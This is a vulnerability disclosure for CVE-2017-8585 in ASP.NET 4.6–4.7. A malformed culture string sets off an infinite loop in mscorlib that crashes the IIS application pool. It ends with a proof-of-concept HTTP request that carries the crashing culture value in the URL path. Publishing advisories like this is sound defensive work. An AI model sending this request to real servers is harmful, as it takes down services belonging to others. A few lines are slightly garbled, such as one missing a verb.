During a fuzzing session as part of our research over the security of common ASP.NET functionalities and design patterns, we discovered a vulnerability in Microsoft Common Object Runtime Library that allows to crash the application pool process of an application hosted on IIS with a simple http request.

Versions Affected

ASP.NET 4.6, 4.6.1, 4.6.2, 4.7

CVE Reference

CVE-2017-8585

Vendor Fix

Microsoft an advisory and associated patches for each of the affected version in ASP.Net.

Description

A standard way of implementing localization in an ASP.NET Mvc application is allowing the user to select the language/culture on the frontend sending it to backend in the URL or as a cookie value. That string could then be used to set the culture of the current thread to allow localization of strings in the views with the help of the proper resource file per culture set.

If a string with double dash is provided as culture, when mscorlib tries to find a translation for a string in a view, an exception will be thrown without clearing the stack of strings to translate, which will cause its GetResourceStringCode function to enter an infinite loop trying to always translate the same string.

As the function includes a check to detect infinite recursion, it will cause a fail fast of the application pool, causing a denial of service in the application until it is restarted.

Proof of concept

GET /en-a-bbbbbbbb/Home/dfasdasdsa HTTP/1.1
Host: 192.168.1.147:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es-ES;q=0.6,es;q=0.4
Connection: close